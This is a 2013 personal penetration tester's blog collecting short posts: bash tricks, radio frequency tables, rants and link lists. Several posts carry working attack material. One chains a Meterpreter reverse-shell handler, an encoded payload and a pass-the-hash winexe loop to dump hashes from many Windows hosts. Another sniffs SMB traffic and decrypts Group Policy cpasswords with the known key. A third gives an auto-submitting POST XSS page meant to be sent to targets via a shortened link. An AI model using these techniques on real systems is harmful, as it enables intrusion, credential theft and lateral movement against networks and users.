Monday, December 30, 2013

Ruby script to grab a fake name out of fakenamegenerator.com

require 'open-uri'
require 'nokogiri'

Nokogiri::HTML(open('http://www.fakenamegenerator.com/')).xpath("//div[@class='address']/h3").collect {|node| puts node.text.strip}

Thursday, November 21, 2013

Burn Linux ISO image to USB drive on a Mac OSX

Ubuntu has a guide on doing it for ubuntu installs, but it should work just fine for the other distros:

http://www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx

I tested it with debian and it worked fine.

Tuesday, November 19, 2013

Legal advice for all you evil hackers

What to do in the case of a "knock and talk" by the police:
http://www.primermagazine.com/2013/learn/legally-speaking-police-are-at-the-door

What to do if the police have a search warrant:
http://www.avvo.com/legal-guides/ugc/what-to-do-when-the-police-show-up-at-your-house-with-a-search-warrant

Monday, October 14, 2013

How to check if an IP from a domain is in a list of IPs

grep $(dig +short blah.domain.com) file-of-ips.txt
the +short parameter only returns the IP that the blah.domain.com resolves to.

Friday, October 4, 2013

VX8DR RX/TX Freqs

Stole this from some forum. just google it and you can find the source.

RX
Frequency Note
0.5 - 1.8 MHz BC Band. AM Radio
1.8 - 30 MHz Shortwave Band.
30 - 78 MHz 6 Meter Ham
76 - 108 MHz FM Radio
108 - 137 MHz Air Band
137 - 174 MHz 144 MHz Ham. 2 Meter
174 - 222 MHz VHF-TV
222 - 225 MHz 222 MHz Ham
225 - 420 MHz General Band 1
420 - 470 MHz 440 MHz Ham. 70 cm.
470 - 800 MHz UHF-TV
800 - 999 MHz General Band 2 Cellular Blocked

TX
50 - 54 MHz
144 - 148 MHz
222 - 225 MHz USA version only
430 - 440 MHz

TX w/ mod
50 - 54 MHz
144 - 148 MHz
148 - 174 MHz MARS/CAP Mod only
222 - 225 MHz USA version only
430 - 440 MHz
440 - 470 MHz MARS/CAP Mod only. FRS/GMRS freq range

Tuesday, September 17, 2013

Test allowed firewall ports

Sometimes you are behind some paywall/captive portal/firewall and you feel like certain pors would be left through if only you knew which of the over 65,000 ports did. The only way to really know is to check each one individually. Thats where http://portquiz.net/ comes in.

It's a site that registers every port as open. This way you know that if something is allowed through, it will come back in your port scan.

So behind your firewall, this:
nmap -p- -T4 portquiz.net -oA firewallcheck
now you can check the firewallcheck.nmap (or parse it out of gnmap) and find out which ports allow data through.

Wednesday, August 21, 2013

Number of Potential Ports in Private IP Space

So this is kind of interesting and it might be useful in the future.

The 10/8 network has 16,777,216 addresses

The 172.16/12 network has 1,048,576 addresses

The 192.168/16 network has 65,536 addresses

Combine those with 65,536 port numbers for TCP and the same for UDP and you get over 2.3 trillion (2,345,052,143,616) potential service endpoints.

So next time someone wants you to scan their private IP space, doesnt tell you what ranges there are and expects you to do it in 2 weeks, tell them to politely fuck off.

Thursday, August 15, 2013

echo colored text in bash

Lots of tutorials tell you to use the "echo -e [blahblah" ANSI escape sequences to generate the colors for output. First of all those are practically impossible to read easily, they look like magic, and its a bitch to try to find a typo.

tput was created a while ago to remedy those issues. I've created a function/script that can be included in other scripts to easily generate colors.
#!/bin/bash
echo_color() {
 case ${1} in
 black)
  shift 1
  #echo $(COLOR)${user-supplied-text}$(NORMAL-COLOR)
  echo $(tput setaf 0)${*}$(tput sgr0)
  ;;
 red)
  shift 1
  echo $(tput setaf 1)${*}$(tput sgr0)
  ;;
 green)
  shift 1
  echo $(tput setaf 2)${*}$(tput sgr0)
  ;;
 yellow)
  shift 1
  echo $(tput setaf 3)${*}$(tput sgr0)
  ;;
 blue)
  shift 1
  echo $(tput setaf 1)${*}$(tput sgr0)
  ;;
 cyan)
  shift 1
  echo $(tput setaf 6)${*}$(tput sgr0)
  ;;
 magenta)
  shift 1
  echo $(tput setaf 5)${*}$(tput sgr0)
  ;;
 white)
  shift 1
  echo $(tput setaf 7)${*}$(tput sgr0)
  ;;
 underline)
  #yes i know its not a color, its still usefull though.
  shift 1
  echo $(tput setaf smul)${*}$(tput sgr0)
  ;;
 custom)
  color_code=${2}
  shift 2
  echo $(tput setaf ${color_code})${*}$(tput sgr0)
  ;;
 ls-color-codes)
  for i in $(seq 0 256); do 
  tput setaf ${i}
  printf " %3s" "$i"
  tput sgr0
  if [ $((($i + 1) % 16)) == 0 ] ; then
   echo #New line
  fi
  done 
  ;;
 *)
  cat <
This script will echo your text as a specified color.

Usage:
 $0
 $0 custom
 $0 ls-color-codes
USAGE
 esac
}
echo_color $*
I'm particularly happy with my ls-color-codes argument, it will print a 16x16 box of the color codes and their colors.

Happy scripting!

Tuesday, August 13, 2013

Automating Meterpreter from bash

This is pretty disgusting and a stupidly unstable hackjob, but it worked and this blog is more for notes for myself anyway...


Generate the post-exploitation comand rc file:

cat > /root/automsf.rc
getsystem
run post/windows/gather/smart_hashdump
run post/windows/gather/cachedump
exit

Then run msfconsole to listen for the callback:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.10
set AutoRunScript multi_console_command -rc /root/automsf.rc
expoit -j -z
 Then generate the payload to use with sce:
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=1.1.1.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
 Then run the forloop while serving sce from a share
for i in `cat file-of-smb-hosts`; do 
echo grabbing $i; 
winexe-PTH -U 'DOM\user%password' --uninstall //$i 'cmd.exe /c \\10.10.10.10\smb_share\sce.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI9lzHOys0uP30aplIKUfQn2QtNkf2vPNk0RdLlK0RftLK42Q86oMg1ZFFVQKOUayPLlElQqqlgrFL5piQXOdMGqzgxbHpaBCgLKV26pnkqR7LVaHPNk1PT8NeYP440J31zpbplKsx6xnkCha0uQiC8cGLBink4tNk7qIFp1io5aiPLlYQjodMwqO7GH9El45S1mIhEkQmtd1eZB3hnkchGTVaiC0fnkTL0KLKpXgluQkcnkwtlKC1xPLIRd14ddQKaKU1Ci1JCa9o9paHSopZNk7bXkmV3mE8FSTrWps0RH3Gt3p2copTBHPL47gVVgYoyEoHj0eQc0ePwYzdRtpPPhWYm; 
done

Now it should iterate through all of the IPs in the text file, executing sce from a share (no hard drive footprint) and executing the callback to your msfconsole listener. It then auto loads the rest of the payload, executes the .rc file, and exists. Rinse and repeat with the next IP

Tuesday, July 23, 2013

SSH Persistent Connection Script

I just reinstalled a test machine and forgot to save my ssh tunnel script so i decided to write a new one.

#!/bin/bash
#this script will constantly maintain (via crontab) a remote forward connection to another machine. This can
#be used as a way to connect to a jumpbox to get over a pesky NAT

remote_listen_port=2222
local_ssh_port=22
remote_host=example.com
remote_user=user1
identity_file=/home/user1/.ssh/key1

connect_string="ssh -N -T -R ${remote_listen_port}:localhost:${local_ssh_port} ${remote_user}@${remote_host} -i ${identity_file} -o ConnectTimeout=60 ServerAliveInterval=10"

process_is_up(){
 ps aux | grep "${connect_string}" | grep -v grep
}

start_bot(){
 ${connect_string}
}


if process_is_up ; then
 echo process is up, exiting
 exit 1
else
 echo process is down, starting now
 start_bot &
fi;
#add to root homedir and then crontab with the following line:
#* * * * * /root/ssh-bot-script.sh > /dev/null

Get/Set Fan Speeds for AMD Video Cards in Linux

I'm messing around with GPU cracking and I've been changing fan speeds manually a lot so I wrote a script to do it for me. This script will output the temperature & fan speed of the two cards in my system, as well as allow me to set the fan speeds for either/both:
#!/bin/bash
#ati-stats.sh - gives environmental stats about the ATI videocards. this assumes you have two cards
get_fan_speed () {
        DISPLAY=:0.${1}
        aticonfig --pplib-cmd "get fanspeed 0" | grep '%' | cut -d ':' -f 3
}

set_fan_speed () {
        DISPLAY=:0.${1}
        aticonfig --pplib-cmd "set fanspeed 0 ${2}"
}

get_temp () {
        aticonfig --adapter=${1} --odgt | grep Temp |cut -d '-' -f 2
}
if [[ -z ${1} ]]; then #if no arguments then output stats
        echo "0: $(get_temp 0) --$(get_fan_speed 0 )"
        echo "1: $(get_temp 1) --$(get_fan_speed 1 )"
else
        case ${1} in
                get)
                        get_fan_speed ${2}
                        ;;
                set)
                        oldspeed=$(get_fan_speed ${2})
                        set_fan_speed ${2} ${3}
                        echo "${2}: ${oldspeed} -> $(get_fan_speed ${2})"
                        ;;
                setboth)
                        oldspeed=$(get_fan_speed 0)
                        set_fan_speed 0 ${2}
                        echo "0: ${oldspeed} -> $(get_fan_speed 0)"
                        oldspeed=$(get_fan_speed 1)
                        set_fan_speed 1 ${2}
                        echo "1: ${oldspeed} -> $(get_fan_speed 1)"
                        ;;
                *)
                        echo "Usage: $0 [get Adapter_NUM | set Adapter_NUM fan_PERCENT | setboth fan_PERCENT]"
                        ;;
        esac;
fi;

Wednesday, June 5, 2013

Getting Better At Bash Scripting

some people really suck at bash scripting. Some people are just lazy. I'm the latter. Often times i know whats best, i just dont care because it really doesnt matter in that particular situation...

Here are a couple sites that made me become the go-to person for bashisms and all the "why doesnt this work" bash questions.

http://wiki.bash-hackers.org/start
http://tldp.org/LDP/abs/html/
http://www.tldp.org/LDP/Bash-Beginners-Guide/html/Bash-Beginners-Guide.html
http://www.tldp.org/LDP/intro-linux/html/intro-linux.html
http://www.tldp.org/LDP/sag/html/sag.html

The bash-hackers link is a frackin' gold mine.

Wednesday, May 29, 2013

Awk vs cut

The useless use of cat is an oft thrown around smack-on-the-hand for lots of noobies asking questions on forums.

This post is not about the useless use of cat, its about me being in a mood to nitpick about something i read on that page. If you go towards the "Gripes" section of the page you will see the following:

Frederick also remarks:

I disagree with your awk/cut comment, as I often use awk for everything and cut for nothing because the syntax for awk is so much cleaner for one liners and I don't have to RTFM so much.
I'll counter that awk is overkill, and you don't need to reread the cut manual after you've read it once or twice; that's my experience. Also cut much more clearly conveys to the reader what is going on -- a small awk script certainly should not take a lot of time to decode, but if you do it too quickly, there might be subtle points which are easy to miss. By contrast, cut doesn't have those subtleties, for better or for worse.

even when doing something as simple as printing out the second column of a line, cut and awk process the line in very importantly different ways: (and just cause i'm an ass, i'll use cat uselessly)

$ cat file
word1 word2 word3
blah1 blah2 blah3

$ cat file | cut -d ' ' -f 2
word2
blah2

$ cat file | awk '{print $2}'
word2
blah2

So let's see here why the cut command sucks balls. Lets add a SINGLE SPACE ANYWHERE between the words. In this case, between word1 and word2:

$ cat file
word1 word2 word3
blah1 blah2 blah3

Now, lets run both cut and awk commands again, starting with awk this time:

$ cat file | awk '{print $2}'
word2
blah2

ok, works like someone would expect it to...what about cut?
$ cat file | cut -d ' ' -f 2

blah2

WTF? yeah, screw you cut. awk ftw

awk is smarter than cut when it comes to recognizing where the "words" are. Cut just looks at the input and thinks that is goes like this:

field1field2field3...
word1NOTHINGword2

so unless you ABSOLUTELY KNOW your input is formatted correctly, use awk instead of cut. its safer

Monday, May 6, 2013

Get list of AD Domain Controllers from DNS records

I used to be dumb and find it annoying to get the list of DCs that I would target in a pentest. Apparently its super easy to get them from DNS records.

nslookup -type=srv _ldap._tcp.dc._msdcs.COMPANY.com
replace COMPANY.com with whatever the actual domain is. If you are using the internal DNS servers, you can typically just do a "nslookup -r 1.2.3.4" to get the FQDN of the machine. That usually provides you with the "COMPANY.com" part.

Enjoy!



Other ways i've found that work:

If you have shell access:
netdom query /D:DOMAINNAME DC
net view /domain
nltest /dsgetdc:DOMAINNAME

Wednesday, April 10, 2013

Monday, April 8, 2013

Learning to Hack - Vulnerable Testbeds

There are a crap ton of vulnerable testbeds to educate the interested in how applications/operatings systems get hacked. I'll update this list as I come across them:

http://vulnhub.com/
http://io.smashthestack.org:84/
https://github.com/stripe-ctf/stripe-ctf
https://github.com/stripe-ctf/stripe-ctf-2.0/
http://www.dvwa.co.uk/
http://www.offensive-security.com/metasploit-unleashed/Metasploitable
http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10
https://github.com/SpiderLabs/SQLol
https://github.com/SpiderLabs/ShelLOL
https://github.com/SpiderLabs/XMLmao
https://github.com/SpiderLabs/XSSmh
https://github.com/SpiderLabs/CryptOMG
https://www.pentesterlab.com/exercises
http://www.overthewire.org/wargames/

EDIT:

Recently found these links on reddit for Capture The Flag challenges:

https://github.com/isislab/Project-Ideas/wiki/Capture-The-Flag-Competitions

Monday, March 18, 2013

Download ShmooCon 2013 Videos

ShmooCon released their videos on their website for everyone to download.

wget -i <(cat <<EOF
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Opening Remarks & Rants.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - How to Own a Building BacNET Attack Framework.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Mainframed The Secrets Inside that Black Box.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - WIPE THE DRIVE - Techniques for Malware Persistence.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Apple iOS Certificate Tomfoolery.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Hide and Seek, Post-Exploitation Style.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Hackers get Schooled Learning Lessons from Academia.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Friday Fire Talks.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Running a CTF - Panel on the Art of Hacker Gaming.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - C10M Defending The Internet At Scale.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Paparazzi Over IP.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - DIY Using Trust to Secure Embedded Projects.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Moloch A New And Free Way To Index Your Packet Capture Repository-1.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - OpenStack Security Brief.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Generalized Single Packet Auth for Cloud Envions.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - From Shotgun Parsers to Better Software Stacks.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - The Computer Fraud and Abuse Act Swartz, Auernheimer, and Beyond.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Malware Analysis Collaboration Automation & Training.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Bright Shiny Things Intelligent DA Control.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Strategies of a World Class Security Inciden.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Armoring Your Android Apps.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Protecting Sensitive Information on iOS Devices.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Beyond Nymwars - Online Identity Battle.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - How Smart Is BlueTooth Smart.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Chopshop Busting the Gh0st.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - The Cloud - Storms on the Horizon.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - 0wn The Con.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - PunkSPIDER Open Source Fuzzing Proj Tgting the Internet.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Crypto - Youre Doing It Wrong.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Identity Based Internet Protocol.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - NSM and more with Bro Network Monitor.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - These Go To Eleven - When the Law Goes Too Far.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Forensics - ExFat Bastardized for Cameras.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Page Fault Liberation Army or Better Security Through Trapping.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Hacking as an Act of War.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - MASTIFF - Automated Static Analysis Framewor.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Attacking SCADA Wireless Systems.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Ka-Ching - How to Make Real Money.mp4
http://www.shmoocon.org/2013/videos/Shmoocon 2013 - Is Practical Info Sharing Possible.mp4
EOF
)

You can copy and paste that into your terminal and it will download the videos to that directory.

Friday, March 8, 2013

Tmux screen logging workaround

I really like tmux, its sexy, sleek, actively developed, and has amazing mouse support. I only had one problem (so far) with the transition from GNU screen: output logging.

GNU screen has an amazing config option that I used almost all the time:

logfile screenlogs/%S%Y%m%d-%n.log
deflog on

The problem is that tmux doesnt have the same option :( the closest thing I have seen is the "pipe-pane" option, but I couldnt find any way to automate that upon startup of tmux. I figured, well since tmux doesnt let me do it, maybe I can hack something together myself. And thats exactly what i did. I give to you...tmux output logging via the script command:
if [[ $TERM = "screen" ]] && [[ $(ps $PPID -o comm=) = "tmux" ]] ; then
logname="$(date '+%d.%m.%Y_%H:%M:%S').tmux.log"
mkdir $HOME/logs 2> /dev/null
script -t 1 $HOME/logs/${logname} bash -login
exit
fi 
The above code basically checks if the $TERM variable is set to "screen" (tmux does this by default) and then check if the parent PID's name is "tmux". then it sets up a logging environment and output everything to the logfile it specifies.

That code works for OSX, for your basic GNU linux setup try this instead:

if [[ $TERM = "screen" ]] && [[ $(ps -p $PPID -o comm=) = "tmux" ]]; then
logname="$(date '+%d.%m.%Y_%H:%M:%S').tmux.log"
mkdir $HOME/logs 2> /dev/null
script -f $HOME/logs/${logname}
exit
fi

All you have to do is put that code into your .profile or .bashrc/.bash_profile and you are good to go.

Enjoy!

Sunday, March 3, 2013

Bash script to sniff, parse, and decrypt cpassword's from GPOs


parse_username(){
echo -n "$1" | grep -o -P 'runAs=".*?"'| cut -d'"' -f 2
}
parse_cpassword(){
echo -n "$1" | grep -o -P 'cpassword=".*?"'| cut -d'"' -f 2
}
decrypt_cpassword(){
cpassword="$1"
pad_length=$(expr 4 - length "${cpassword}" % 4) # figure out the padding length
padding=$(for i in {1..${pad_length}}; do printf =; done) #output correct padding string
#pad, b64 decode, then decrypt the password
echo $(echo -n ${cpassword}${padding} | base64 -d | openssl aes-256-cbc -d -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv '')
}

tshark -R 'smb.cmd==0x2e and tcp contains 'cpassword'' -Tfields -e smb.file_data \
| xxd -r -p | grep cpassword \
| while read line; do \
echo $(parse_username "$line"):$(decrypt_cpassword $(parse_cpassword "$line"));
done

Figlet Fonts

These seems to be the least retarded....


univers
stop
starwars
standard
graffiti
big

figlet -f stop KITTENS

Wednesday, February 27, 2013

The Best USB WiFi Adapter for Pentests

I've spent a couple days researching what is the best USB wifi adapter to use in wireless penetration tests/site surveys.

If you are only concerned about the 2.4ghz spectrum than the widely suggested ALFA AWUS036H is still the best and works flawlessly out of the box.

The problem arises when you are trying to encompass both 2.4 and 5ghz ranges. I'll save you the rant about my search for the right device and i'll just give it to you here:

The only Dual Band (2.4/5ghz) USB adapter that works out of the box with everything including WPS cracking (reaver) that you can currently buy is the Ubiquiti SR71 USB Adapter. It comes up as the carl9170 driver in BT5r3.

http://www.amazon.com/Ubiquiti-Networks-SR71-USB-WLAN-802-11a/dp/B004EFND3I/ref=sr_1_1?ie=UTF8&qid=1361984587&sr=8-1&keywords=sr71+usb

Hopefully this saves you the days it took me to figure out which one is the best.


NOTE:
After some extensive testing i've noticed that it sometimes has a problem with WPS cracking and can be a bit finicky with the drivers. The ALFA AWUS036H still works flawlessly. I'm going to be testing more and more devices and will report when i have something.

Monday, February 11, 2013

Exploiting POST Based XSS

Found this on the web somewhere and wanted to post it here to have a place to reference it. place the actual XSS in the "abcd" section and place it on a webserver somwhere. Bitly link the exploit code to your target and have it execute.
<body onload=”xss();”>
<form method=post name=f action=”http://www.example.com/whatever.php”>
<input name=”abcd” value=”<SCRIPT>alert(’XSS’)</SCRIPT>”>
<input type=”submit” class=”button” name=”s”>
</form>
<script>
function xss() {
document.f.s.click();
}
</script>
</body>

Tuesday, February 5, 2013

Using Nmap Output in Nikto

Nikto can read/parse nmap output to supply a list of hosts and ports to scan:

nikto -h nmap_scan.gnmap

This will make nikto read the gnmap file, pull out the hostnames and port numbers and start scanning. It really handy versus manually grepping out entries to scan.

Monday, February 4, 2013

Base64 Encoding and the Stupid Things Developers Do

Base64 encoding is everywhere. It the #1 data encoding type used on the internet. Even though it technically increases the size of the data by 33% its still used in spaces where speed is of the utmost importance.

Why?
Mainly because of two reasons. Its ubiquitous  and it was meant to be used to transmit non ascii data in ascii only systems. Base64 was originally designed as a method to transmit binary information through plaintext channels such as attachments on emails. Email is still plaintext, so anything thats not plaintext needs to be represented differently or else the email servers/clients would barf upon reading it.

Where the Problem Lay:
The problem is when developers dont truly understand the concepts of encoding and mentally group it into the same category as encryption. ENCODING IS NOT ENCRYPTION and dont let anyone tell you otherwise. Changing the location of the secret base from english to spanish does not protect the location from the enemy. It's especially annoying when someone tries to back up the argument of encoding as encryption by saying something like "well if they dont speak spanish then its just as good". No, its not. Because that not security, thats obfuscation  All i have to do is find someone who speaks spanish and the game is over. I used to think that if you used a encoding type nobody has ever seen before than maybe thats moving into the security category, but unfortunately its not. This is because that requires a massive underestimation of the ability of people to obsess over puzzles. Just dont do it, its really not that hard...

So, if you have sensitive information (passwords, credit cards, SSNs, keys, etc) and you only base64 encode them, then you are sending them cleartext. Every developer should consider base64 encoding as the equivalent security as plaintext, because in the end, it is.

Bash Caveat - It's all just text


 This is an important thing to consider when writing Bash scripts. In my experience its not necessarily the little command tricks that you know that make you a better coder, it’s the underlying understanding of how things work.

You’re dealing with Text
Mentally keeping track of the contents of variables, or whats being passed in a pipe is actually rather simple in Bash. Everything is a string. There is no fancy Object oriented concepts that you have to consider when dealing with data. It’s all just text. Take the following for example:

Cat file | cut –f1 | sort –u | wc –l

While the above follows under the category of “useless use of cat” it’s done to illustrate a point. You are taking the text output of a command and passing it as the text input of another command. THAT’S IT. The “target” program that you pass the data to has its own rules on how to deal with the text. In the above case what is happening is cat is opening the file, outputting the contents of the file as the input for the cut command, which reads in the text, and (due to –f1) outputs the first tab delimited field as output. This output text is being passed directly to the sort command which will alphabetically sort the list and eliminate the duplicates (-u). Sort then outputs this text, and the pipe (again) takes the output and sends it to wc which will count how many lines (-l) and output the result.

The only thing programs like this are designed to do is mangle/modify/analyze text in some way.

The nice thing about only dealing with text is that you can see its state/contents at any point, simply by outputting it to the screen.

I believe that keeping in mind you are only dealing with strings of text is one of the most important considerations to remember when writing bash scripts. 

The other good thing about the "everything is a string" philosophy is that you can tell which programs where built for scripting and which were mainly built for human consumption. The main question you have to ask is: How much parsing of text do i have to do to get some simple data out? If the answer is "a lot", then you may want to search for another tool/program that is more API-esque focused.

Saturday, January 26, 2013

Rant: OSX Find Clipboard - Invokes Baby Punching

OSX has multiple clipboards that allow you to do fairly user friendly actions such as drag and drop various files, fonts, text, etc. Among these clipboards is the global "Find Pasteboard". This has been by far the stupidest and more shortsighted idea i have ever seen implemented by apple.

At first it seems like a great idea, select text somewhere, hit cmd+e and search for it in a completely separate application just by hitting cmd+g. I'm sure certain people find that very useful. But there is a problem with this. A problem that makes me want to punch babies.

For example:
if you search for text in chrome on a webpage, and you switch to sublime text 2 to search for something in your code, it automatically inputs the text that you typed into chrome, into the sublime "find" box. ok...thats odd, i'll just backspace and start typing my search. Ah damn, i forgot the syntax to that one perl regex. When you switch back to chrome to search the page, IT COMPLETELY WIPES OUT/REPLACES YOUR SEARCH IN SUBLIME. so that big long regex i was typing in sublime? gone. Thanks apple, your "feature" wiped out the last 30 minutes of research i was doing.

oh.my.god. this is the type of thing that creates serial killers.

The absolute worst part about all of it, the part where apple's arrogance and unbelievable big head ruins everything, is in the fact that THERE IS NO WAY TO DISABLE IT. AT ALL. ZILCH. NADA. They simply say that "this is intended behavior" which is the equivalent of them giving you the finger and saying "deal with it".

The entire idea of the find clipboard itself is stupid. It's a feature thats hardly known, and much more likely to cause frustration and issues than the problems it solves. The probability that you need to search for two different strings in different applications is obscenely higher than the few situations in which you want to search text from one app in another.

I'm not saying take this feature out, as i'm sure someone might be using it, i'm simply asking for a way to disable it.

This issue is more evidence of what i believe to be apple's worst quality, the arrogance of their imposed "user experience" on the consumer. I'm done with apple, this issue is on top of the dozens of other things that have driven me mad by them. I'm doing back to linux. At least then i have %100 control over my computer.

Thursday, January 24, 2013

Barracuda SSH Backdoors

Today i learned of an advisory posted on reddit regarding Barracuda and certain "support" ssh backdoors installed on many of their products. Unfortunately i dont have a Barracuda product to test the specific attack strings on, but i have been able to gather quite a bit of information on it:

Here is the reddit netsec article on it:
http://www.reddit.com/r/netsec/comments/176p7z/critical_ssh_backdoor_in_multiple_barracuda/

Here is the Neohapsis copypasta from SEC-consult:
http://archives.neohapsis.com/archives/fulldisclosure/2013-01/0221.html

Here is the original advisory:
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130124-0_Barracuda_Appliances_Backdoor_wo_poc_v10.txt

Barracuda released several "tech alerts" about this vuln:
https://www.barracudanetworks.com/support/techalerts

Here is a full disclosure post in 2011 where someone suspected Barracuda had a backdoor (for lolz)
http://seclists.org/fulldisclosure/2011/Apr/460

Here is a blog post from 2009 (seriously) of a guy that got root access from the console and revealed overlapping details about the advisory:
http://blog.shiraj.com/2009/09/barracuda-spam-firewall-root-password/

Summary of the situation:
The following products:
     Barracuda Spam and Virus Firewall
     Barracuda Web Filter
     Barracuda Message Archiver
     Barracuda Web Application Firewall
     Barracuda Link Balancer
     Barracuda Load Balancer
     Barracuda SSL VPN
     (all including their respective virtual "Vx" versions)
vulnerable version: all versions less than Security Definition 2.0.5

All have preinstalled (undocumented) support accounts with SSH access in /etc/passwd.
The "product" support account drops you to shell without requiring SSH keys. Which also has access to the MySQL database that can modify the list of users who can log in...

Only hosts coming from certain IPs can access this ssh daemon:
192.168.200.0/24
192.168.10.0/24
205.158.110.0/24
216.129.105.0/24

There are certain reports that the "product" user requires no password.

If anyone can get me the user hashes, i can run it through my (pretty big/extensive) wordlists with rulesets.

Tuesday, January 22, 2013

Edit Text Without Using Files

Lots of times on engagements i'll have to take a big chunk of data, for example user credentials, and parse/format them a particular way. Typically it can be done quickly by placing the text into a small temp file, and then parsing the contents that way.

The problem is that you are then left with a bunch of crap files you dont need. Granted, i could just put everything in the /tmp folder, or create another temp folder alltogether, but i didnt want to have to deal with files at all.

In come here documents. Here documents are awesome for stuff like this. Take this example:


cat <<EOFMEOW | awk '{print $3}'
>ZOMG THE TEXT
>IT GOES HERE
>WHERE?
>IT GOES HERE LOLZ
>EOFMEOW

TEXT
HERE
HERE


Now all i need to do is just paste the text once it spits back the '>' prompt.

Wednesday, January 16, 2013

Windows Network Service Internals - IPC/RPC

http://www.hsc.fr/ressources/articles/win_net_srv/index.html


Here are the core MSRPC functions/capabilities. It includes things like interacting with the SAM, the registry, the event log, the service control manager and much more:

http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_core.html

Saturday, January 5, 2013

Pentest Bookmarks - Single Links

Here is a list of the pentest-bookmarks grabbed from http://code.google.com/p/pentest-bookmarks/
I needed to parse them for a project, so i modified it to be a one-line-per-link format. I figured someone else might be able to use it for something so I'm posting it here.

EDIT: here is the line i used:

grep -E -o '<A HREF=\"http.*?\"' <(curl http://pentest-bookmarks.googlecode.com/files/bookmarksv1.5.html) | sort -u | cut -d \" -f 2

http://academy.delmar.edu/Courses/ITSY2430/eBooks/Ettercap(ManInTheMiddleAttack-tool).pdf
http://achtbaan.nikhef.nl/27c3-stream/releases/mkv/
http://addictomatic.com/
http://andlabs.org/tools.html#dser
http://andlabs.org/tools.html#sotf
http://arachni.segfault.gr/news
http://archangelamael.blogspot.com/
http://articles.manugarg.com/arp_spoofing.pdf
http://asturio.gmxhome.de/software/sambascan2/i.html
http://avondale.good.net/dl/bd/
http://bandwidthco.com/whitepapers/netforensics/arp/EtterCap%20ARP%20Spoofing%20&%20Beyond.pdf
http://bandwidthco.com/whitepapers/netforensics/arp/Fun%20With%20EtterCap%20Filters.pdf
http://bernardodamele.blogspot.com/
http://blindelephant.sourceforge.net/
http://blog.0x0e.org/2009/11/20/pentesting-with-an-ubuntu-box/#comments
http://blog.0x3f.net/tool/keimpx-in-action/
http://blog.andlabs.org/
http://blog.c22.cc/
http://blog.commandlinekungfu.com/
http://blog.insicdesigns.com/2009/01/secure-file-upload-in-php-web-applications/
http://blog.metasploit.com/
http://blog.metasploit.com/2010/03/automating-metasploit-console.html
http://blog.metasploit.com/2010/05/introducing-metasploitable.html
http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
http://blog.ombrepixel.com/
http://blog.ombrepixel.com/post/2009/05/06/Lotus-Notes/Domino-Security
http://blog.portswigger.net/
http://blog.securitymonks.com/2009/08/15/whats-in-your-folder-security-cheat-sheets/
http://blog.sipvicious.org/
http://blog.skeptikal.org/
http://blog.skeptikal.org/2009/11/adobe-responds-sort-of.html
http://blog.spiderlabs.com/
http://blog.zenone.org/2009/03/pci-compliance-disable-sslv2-and-weak.html
http://bright-shadows.net/
http://capture.thefl.ag/calendar/
http://carnal0wnage.attackresearch.com/node/410
http://carnal0wnage.attackresearch.com/node/436?utm_source=twitterfeed&utm_medium=twitter
http://carnal0wnage.blogspot.com/
http://carnal0wnage.blogspot.com/2007/07/using-sqid-sql-injection-digger-to-look.html
http://centralops.net/co/
http://cfunited.com/2009/files/presentations/254_ShlomyGantz_August2009_HackProofingColdFusion.pdf
http://cirt.net/passwords
http://cirt.net/ports_dl.php?export=services
http://clez.net/
http://code.google.com/edu/languages/google-python-class/index.html
http://code.google.com/p/fimap/wiki/WindowsAttack
http://code.google.com/p/fm-fsf/
http://code.google.com/p/fuzzdb/
